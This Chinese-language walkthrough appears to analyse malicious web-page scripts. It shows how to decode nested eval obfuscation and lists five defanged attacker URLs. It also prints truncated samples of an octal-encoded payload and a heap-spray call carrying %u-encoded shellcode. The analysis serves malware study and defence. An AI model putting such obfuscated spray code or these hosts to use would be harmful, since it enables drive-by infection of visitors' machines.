主要代码如下:
看到代码是这种形式的
还是老方法把开头的红色eval替换为alert 然后把整个代码保存到本地的文本文档里 并改名为.htm 运行
然后就会弹出解出来的结果 可以看到是二次加密了的
在弹出框里ctrl+c把代码复制出来保存到文本文档里 并且在代码前后加上开始标签和结束标签
然后再改名为.htm运行 这时就能得到解出来的地址了
document.writeln(”
document.writeln(”
document.writeln(”
document.writeln(”
document.writeln(”
结合之前的网址,就是
hXXp://i843y.cn/box/b02/ci7.htm
hXXp://i843y.cn/box/b02/fx.htm
hXXp://i843y.cn/box/b02/newcmd.htm
hXXp://i843y.cn/box/b02/rcmd.htm
hXXp://i843y.cn/box/b02/call.htm
以ci7.htm为例
会跳转到hXXp://i843y.cn/box/b02/i7.htm
这个网页中间有一大段eval开头的
eval(”\163\160\162\141\171\50\42\45\165\65\42\53\42\66\42\53\42\145\70\42\53\42\45\165\60\42\53\42\60\60\60\45\165\65\63\42\53\42\60\60\45\165\42\53\42
这种加密模式的在freshow里直接选择esc模式解码 点decode后直接就解出到下面的框里了
不过解出来的还是加密的
但是这种加密方式
eval(”spray(”%u5″+”6″+”e8″+”%u0″+”000%u53″+”00%u”+”56″+”55%u8b”+”57%u246c%u8b”+”18%u3c45%u548b%u7″+”805%uea01%u4a8b%u8b”+”18%u20″+”5a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1
直接把eval后面的那一大段弄到shellcode解码器里 就能解出来了